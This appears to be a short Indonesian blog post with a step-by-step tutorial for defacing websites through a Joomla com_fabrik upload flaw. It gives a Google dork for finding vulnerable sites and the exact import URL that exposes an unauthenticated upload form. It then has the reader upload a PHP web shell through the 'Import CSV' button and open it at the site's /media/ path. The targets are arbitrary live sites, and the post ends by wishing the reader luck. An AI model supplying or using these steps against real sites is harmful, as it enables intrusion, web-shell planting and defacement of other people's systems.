Hari ini aku mau ngasih trik deface web dengan com_fabrik
Cara yang satu ini cukup mudah dilakukan.
Dengan menggunakan exploit com_fabrik,
kita bisa mengupload shell kita untuk
melakukan deface terhadap web tersebut.
Ok simak tutorial berikut.
1. Ketik dork berikut ke
google : inurl:index.php?option=com_fabrik
2. Akan ada banyak web, anda buka
terserah yang mana
3. Masukkan exploit ini : index.php?
option=com_
fabrik&c=import&view=import&filetype=csv
&table=1
Contoh : www.site.com/index.php?
option=com_
fabrik&c=import&view=import&filetype=csv
&table=1
4. Jika tidak berhasil cari target lain. Jika
berhasil akan muncul form upload seperti
ini
5. Klik "pilih file" untuk memilih shell, dan
klik "Import CSV untuk mengupload
6. Jika berhasil, buka shell anda dengan
format : www.site.com/media/namashell.php
7. Dan muncullah shell kesayangan anda.
Namun jika tidak muncul, itu karena web
tersebut tidak mendukung file berformat
php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba ^_^
Tidak ada komentar:
Posting Komentar